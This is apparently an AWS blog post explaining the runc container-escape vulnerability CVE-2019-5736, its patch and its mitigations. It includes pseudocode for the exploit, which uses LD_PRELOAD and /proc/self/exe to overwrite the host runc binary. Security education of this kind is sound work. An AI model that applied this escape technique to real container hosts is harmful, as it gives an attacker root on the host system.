Note: This post was originally published on the AWS Compute Blog.
On Monday, February 11, CVE-2019-5736 was disclosed. This vulnerability is a flaw in runc, which can be exploited to escape Linux containers launched with Docker, containerd, CRI-O, or any other user of runc. But how does it work? Dive in!
This concern has already been addressed for AWS, and no customer action is required. For more information, see the security bulletin.
A review of Linux process management
Before I explain the vulnerability, here’s a review of some Linux basics.
Processes and syscalls
Processes form the core unit of running programs on Linux. Every launched program is represented by one or more processes. Processes contain a variety of data about the running program, including a process ID (pid), a table tracking in-use memory, a pointer to the currently executing instruction, a set of descriptors for open files, and so forth.
Processes interact with the operating system to perform a variety of operations
(for example, reading and writing files, taking input, communicating on the
network, etc.) via system calls, or
syscalls. Syscalls can perform a variety of actions. The ones I’m interested in
today involve creating other processes (typically through fork(2)
or
clone(2)
) and changing the currently running program into something else
(execve(2)
).
File descriptors are how a
process interacts with files, as managed by the Linux kernel. File descriptors
are short identifiers (numbers) that are passed to the appropriate syscalls for
interacting with files: read(2)
, write(2)
, close(2)
, and so forth.
Sometimes a process wants to spawn another process. That might be a shell
running a program you typed at the terminal, a daemon that needs a helper, or
even concurrent processing without threads. When this happens, the process
typically uses the fork(2)
or clone(2)
syscalls.
These syscalls have some differences, but they both operate by creating another copy of the currently executing process and sharing some state. That state can include things like the memory structures (either shared memory segments or copies of the memory) and file descriptors.
After the new process is started, it’s the responsibility of both processes to
figure out which one they are (am I the parent? Am I the child?). Then, they
take the appropriate action. In many cases, the appropriate action is for the
child to do some setup, and then execute the execve(2)
syscall.
The following example shows the use of fork(2)
, in pseudocode:
func main() {
child_pid= fork();
if (child_pid > 0) {
// This is the parent process, since child_pid is the pid of the child
// process.
} else if (child_pid == 0) {
// This is the child process. It can retrieve its own pid via getpid(2),
// if desired. This child process still sees all the variables in memory
// and all the open file descriptors.
}
}
The execve(2)
syscall instructs the Linux kernel to replace the currently
executing program with another program, in-place. When called, the Linux kernel
loads the new executable as specified and pass the specified arguments. Because
this is done in place, the pid is preserved and a variety of other contextual
information is carried over, including environment variables, the current
working directory, and any open files.
func main() {
// execl(3) is a wrapper around the execve(2) syscall that accepts the
// arguments for the executed program as a list.
// The first argument to execl(3) is the path of the executable to
// execute, which in this case is the pwd(1) utility for printing out
// the working directory.
// The next argument to execl(3) is the first argument passed through
// to the new program (in a C program, this would be the first element
// of the argc array, or argc[0]). By convention, this is the same as
// the path of the executable.
// The remaining arguments to execl(3) are the other arguments visible
// in the new program's argc array, terminated by NULL. As you're
// not passing any additional arguments, just pass NULL here.
execl("/bin/pwd", "/bin/pwd", NULL);
// Nothing after this point executes, since the running process has been
// replaced by the new pwd(1) program.
}
Wait…open files? By default, open files are passed across the execve(2)
boundary. This is useful in cases where the new program can’t open the file,
for example if there’s a new mount covering the existing path. This is also the
mechanism by which the standard I/O streams (stdin
, stdout
, and stderr
)
are made available to the new program.
While convenient in some use cases, it’s not always desired to preserve open
file descriptors in the new program. This behavior can be changed by passing the
O_CLOEXEC
flag to open(2)
when opening the file or by setting the
FD_CLOEXEC
flag with fnctl(2)
. Using O_CLOEXEC
or FD_CLOEXEC
(which are
both short for close-on-exec) prevents the new program from having access to the
file descriptor.
func main() {
// open(2) opens a file. The first argument to open is the path of the file
// and the second argument is a bitmask of flags that describe options
// applied to the file that's opened. open(2) then returns a file
// descriptor, which can be used in subsequent syscalls to represent this
// file.
// For this example, open /dev/urandom, which is a file containing random
// bytes. Pass two flags: O_RDONLY and O_CLOEXEC; O_RDONLY indicates that
// the file should be open for reading but not writing, and O_CLOEXEC
// indicates that the file descriptor should not pass through the execve(2)
// boundary.
fd = open("/dev/urandom", O_RDONLY | O_CLOEXEC);
// All valid file descriptors are positive integers, so a returned value < 0
// indicates that an error occurred.
if (fd < 0) {
// perror(3) is a function to print out the last error that occurred.
error("could not open /dev/urandom");
// exit(3) causes a process to exit with a given exit code. Return 1
// here to indicate that an error occurred.
exit(1);
}
}
What is /proc
?
/proc
(or proc(5)
) is a pseudo-filesystem that provides access to a number
of Linux kernel data structures. Every process in Linux has a directory
available for it called /proc/[pid]
. This directory stores a bunch of
information about the process, including the arguments it was given when the
program started, the environment variables visible to it, and the open file
descriptors.
The special files inside /proc/[pid]/fd
describe the file descriptors that the
process has open. They look like symbolic links (symlinks), and you can see the
original path of the file, but they aren’t exactly symlinks. You can pass them
to open(2)
even if the original path is inaccessible and get another working
file descriptor.
Another file inside /proc/[pid]
is called exe
. This file is like the ones
in /proc/[pid]/fd
except that it points to the binary program that is
executing inside that process.
/proc/[pid]
also has a companion directory, /proc/self
. This directory is
always the same as /proc/[pid]
of the process that is accessing it. That is,
you can always read your own /proc
data from /proc/self
without knowing your
pid.
Dynamic linking
When writing programs, software developers typically use libraries—collections of previously written code intended to be reused. Libraries can cover all sorts of things, from high-level concerns like machine learning to lower-level concerns like basic data structures or interfaces with the operating system.
In the code example above, you can see the use of a library through a call to a
function defined in a library (fork
).
Libraries are made available to programs through linking: a mechanism for resolving symbols (types, functions, variables, etc.) to their definition. On Linux, programs can be statically linked, in which case all the linking is done at compile time and all symbols are fully resolved. Or they can be dynamically linked, in which case at least some symbols are unresolved until a runtime linker makes them available.
Dynamic linking makes it possible to replace some parts of the resulting code without recompiling the whole application. This is typically used for upgrading libraries to fix bugs, enhance performance, or to address security concerns. In contrast, static linking requires re-compiling and re-linking each program that uses a given library to affect the same change.
On Linux, runtime linking is typically performed by ld-linux.so(8)
, which is
provided by the GNU project
toolchain. Dynamically linked libraries are specified by a name embedded into
the compiled binary. This dynamic linker reads those names and then performs a
search across a standard set of paths to find the associated library file (a
shared object file, or .so
).
The dynamic linker’s search path can be influenced by the LD_LIBRARY_PATH
environment variable. The LD_PRELOAD
environment variable can tell the linker
to load additional, user-specified libraries before all others. This is useful
in debugging scenarios to allow selective overriding of symbols without having
to rebuild a library entirely.
The vulnerability
Now that the cast of characters is set (fork(2)
, execve(2)
, open(2)
,
proc(5)
, file descriptors, and linking), I can start talking about the
vulnerability in runc.
runc is a container runtime. Like a shell, its primary purpose is to launch other programs. However, it does so after manipulating Linux resources like cgroups, namespaces, mounts, seccomp, and capabilities to make what is referred to as a “container.”
The primary mechanism for setting up some of these resources, like namespaces,
is through flags to the clone(2)
syscall that take effect in the new process.
The target of the final execve(2)
call is the program the user requested. It
With a container, the target of the final execve(2)
call can be specified in
the container image or through explicit arguments.
The CVE announcement states:
“The vulnerability allows a malicious container to […] overwrite the host runc binary […]. The level of user interaction is being able to run any command […] as root within a container [when creating] a new container using an attacker-controlled image.”
The operative parts of this are: being able to overwrite the host runc binary (that seems bad) by running a command (that’s…what runc is supposed to do…). Note too that the vulnerability is as simple as running a command and does not require running a container with elevated privileges or running in a non-default configuration.
Don’t containers protect against this?
Containers are, in many ways, intended to isolate the host from a given workload
or to isolate a given workload from the host. One of the main mechanisms for
doing this is through a separate view of the filesystem. With a separate view,
the container shouldn’t be able to access the host’s files and should only be
able to see its own. runc accomplishes this using a mount namespace and
mounting the container image’s root filesystem as /
. This effectively hides
the host’s filesystem.
Even with techniques like this, things can pass through the mount namespace.
For example, the /proc/cmdline
file contains the running Linux kernel’s
command-line parameters. One of those parameters typically indicates the host’s
root filesystem, and a container with enough access (like CAP_SYS_ADMIN
) can
remount the host’s root filesystem within the container’s mount namespace.
That’s not what I’m talking about today, as that requires non-default privileges
to run. The interesting thing today is that the /proc
filesystem exposes a
path to the original program’s file, even if that file is not located in the
current mount namespace.
What makes this troublesome is that interacting with Linux primitives like namespaces typically requires you to run as root, somewhere. In most installations involving runc (including the default configuration in Docker, Kubernetes, containerd, and CRI-O), the whole setup runs as root.
runc must be able to perform a number of operations that require elevated
privileges, even if your container is limited to a much smaller set of
privileges. For example, namespace creation and mounting both require the
elevated capability CAP_SYS_ADMIN
, and configuring the network requires the
elevated capability CAP_NET_ADMIN
. You might see a pattern here.
An alternative to running as root is to leverage a user namespace. User namespaces map a set of UIDs and GIDs inside the namespace (including ones that appear to be root) to a different set of UIDs and GIDs outside the namespace. Kernel operations that are user-namespace-aware can delineate privileged actions occurring inside the user namespace from those that occur outside.
However, user namespaces are not yet widely employed and are not enabled by default. The set of kernel operations that are user-namespace-aware is still growing, and not everyone runs the newest kernel or user-space software.
So, /proc
exposes a path to the original program’s file, and the process that
starts the container runs as root. What if that original program is something
important that you knew would run again… like runc?
Exploiting it!
runc’s job is to run commands that you specify. What if you specified
/proc/self/exe
? It would cause runc to spawn a copy of itself, but running
inside the context of the container, with the container’s namespaces, root
filesystem, and so on. For example, you could run the following command:
docker run --rm amazonlinux:2 /proc/self/exe
This, by itself, doesn’t get you far—runc doesn’t hurt itself.
Generally, runc is dynamically linked against some libraries that provide
implementations for seccomp(2)
,
SELinux, or
AppArmor. If you remember from
earlier, ld-linux.so(8)
searches a standard set of file paths to provide these
implementations at runtime. If you start runc again inside the container’s
context, with its separate filesystem, you have the opportunity to provide other
files in place of the expected library files. These can run your own code
instead of the standard library code.
There’s an easier way, though. Instead of having to make something that looks
like (for example) libseccomp, you can take advantage of a different feature of
the dynamic linker: LD_PRELOAD
. And because runc lets you specify environment
variables along with the path of the executable to run, you can specify this
environment variable, too.
With LD_PRELOAD
, you can specify your own libraries to load first, ahead of
the other libraries that get loaded. Because the original libraries still get
loaded, you don’t actually have to have a full implementation of their
interface. Instead, you can selectively override some common functions that you
might want and omit others that you don’t.
So now you can inject code through LD_PRELOAD
and you have a target to inject
it into: runc, by way of /proc/self/exe
. For your code to get run, something
must call it. You could search for a target function to override, but that
means inspecting runc’s code to figure out what could get called and how.
Again, there’s an easier way. Dynamic libraries can specify a “constructor”
that is run immediately when the library is loaded.
Using the “constructor” along with LD_PRELOAD
and specifying the command as
/proc/self/exe
, you now have a way to inject code and get it to run. That’s
it, right? You can now write to /proc/selcf/exe
and overwrite runc!
Not so fast.
The Linux kernel does have a bit of a protection mechanism to prevent you from
overwriting the currently running executable. If you open /proc/self/exe
for
writing, you get -ETXTBSY
. This error code indicates that the file is busy,
where “TXT” refers to the text (code) section of the binary.
You know from earlier that execve(2)
is a mechanism to replace the currently
running executable with another, which means that the original executable isn’t
in use anymore. So instead of just having a single library that you load with
LD_PRELOAD
, you also must have another executable that can do the dirty work
for you, which you can execve(2)
.
Normally, doing this would still be unsuccessful due to file permissions.
Executables are typically not world-writable. But because runc runs as root and
does not change users, the new runc process that you started through
/proc/self/exe
and the helper program that you executed are also run as root.
After you gain write access to the runc file descriptor and you’ve replaced the
currently executing program with execve(2)
, you can replace runc’s content
with your own. The other software on the system continues to start runc as part
of its normal operation (for example, creating new containers, stopping
containers, or performing exec
operations inside containers). Your code has
the chance to operate instead of runc. When it gets run this way, your code
runs as root, in the host’s context instead of in the container’s context.
Now you’re done! You’ve successfully escaped the container and have full root access.
Putting that all together, you get something like the following pseudocode:
Pseudocode for preload.so
func constructor(){
// /proc/self/exe is a virtual file pointing to the currently running
// executable. Open it here so that it can be passed to the next
// process invoked. It must be opened read-only, or the kernel will fail
// the open syscall with ETXTBSY. You cannot gain write access to the text
// portion of a running executable.
fd = open("/proc/self/exe", O_RDONLY);
if (fd < 0) {
error("could not open /proc/self/exe");
exit(1);
}
// /proc/self/fd/%d is a virtual file representing the open file descriptor
// to /proc/self/exe, which you opened earlier.
filename = sprintf("/proc/self/fd/%d", fd);
// execl is a call that executes a new executable, replacing the
// currently running process and preserving aspects like the process ID.
// Execute the "rewrite" binary, passing it arguments representing the
// path of the open file descriptor. Because you did not pass O_CLOEXEC when
// opening the file, the file descriptor remains open in the replacement
// program and retains the same descriptor.
execl("/rewrite", "/rewrite", filename, NULL);
// execl never returns, except on an error
error("couldn't execl");
}
Pseudocode for the rewrite program
// rewrite is your cooperating malicious program that takes an argument
// representing a file descriptor path, reopens it as read-write, and
// replaces the contents. rewrite expects that it is unable to open
// the file on the first try, as the kernel has not closed it yet
func main(argc, *argv[]) {
fd = 0;
printf("Running\n");
for(tries = 0; tries < 10000; tries++) {
// argv[1] is the argument that contains the path to the virtual file
// of the read-only file descriptor
fd = open(argv[1], O_RDWR|O_TRUNC);
if( fd >= 0 ) {
printf("open succeeded\n");
break;
} else {
if(errno != ETXTBSY) {
// You expect a lot of ETXTBSY, so only print when you get
something else
error("open");
}
}
}
if (fd < 0) {
error("exhausted all open attempts");
exit(1);
}
dprintf(fd, "CVE-2019-5736\n");
printf("wrote over runc!\n");
fflush(stdout);
}
The above code was written by Noah Meyerhans, iliana weller, and Samuel Karp.
How does the patch work?
If you try the same approach with a patched runc, you instead see that opening
the file with O_RDWR
is denied. This means that the patch is working!
The runc patch operates by taking advantage of some Linux kernel features
introduced in kernel 3.17, specifically a syscall called memfd_create(2)
.
This syscall creates a temporary memory-backed file and a file descriptor that
can be used to access the file. This file descriptor has some special
semantics: It is automatically removed when the last reference to it is
dropped. It’s also in memory, so that just equates to freeing the memory. It
supports another useful feature: file sealing. File sealing allows the file to
be made immutable, even to processes that are running as root.
The runc patch changes the behavior of runc so that it creates a copy of itself
in one of these temporary file descriptors, and then seals it. The next time a
process launches (via fork(2)
) or a process is replaced (via execve(2)
),
/proc/self/exe
will be this sealed, memory-backed file descriptor. When your
rewrite program attempts to modify it, the Linux kernel prevents it as it’s a
sealed file.
Could I have avoided being vulnerable?
Yes, a few different mechanisms were available before the patch that provided mitigation for this vulnerability. The one that I mentioned earlier is user namespaces. Mapping to a different user namespace inside the container would mean that normal Linux file permissions would effectively prevent runc from becoming writable because the compromised process inside the container is not running as the real root user.
Another mechanism, which is used by Google Container-Optimized OS, is to have the host’s root filesystem mounted as read-only. A read-only mount of the runc binary itself would also prevent the runc binary from becoming writable.
SELinux, when correctly configured, may also prevent this vulnerability.
A different approach to preventing this vulnerability is to treat the Linux kernel as belonging to a single tenant, and spend your effort securing the kernel through another layer of separation. This is typically accomplished using a hypervisor or a virtual machine.
Amazon invests heavily in this type of boundary. Amazon EC2 instances, AWS Lambda functions, and AWS Fargate tasks are secured from each other using techniques like these. Amazon EC2 bare-metal instances leverage the next-generation Nitro platform that allows AWS to offer secure, bare-metal compute with a hardware root-of-trust. Along with traditional hypervisors, the Firecracker virtual machine manager can be used to implement this technique with function- and container-like workloads.
Further reading
The original researchers who discovered this vulnerability have published their own post, CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host. They describe how they discovered the vulnerability, as well as several other attempts.
I’d like to thank the original researchers who discovered the vulnerability for reporting responsibly and the OCI maintainers (and Aleksa Sarai specifically) who coordinated the disclosure. Thanks to Linux distribution maintainers and cloud providers who made updated packages available quickly. I’d also like to thank the Amazonians who made it possible for AWS customers to be protected:
- AWS Security who ran the whole process
- Clare Liguori, Onur Filiz, Noah Meyerhans, iliana weller, and Tom Kirchner who performed analysis and validation of the patch
- The Amazon Linux team (and iliana weller specifically) who backported the patch and built new Docker RPMs
- The Amazon ECS, Amazon EKS, and AWS Fargate teams for making patched infrastructure available quickly
- And all of the other AWS teams who put in extra effort to protect AWS customers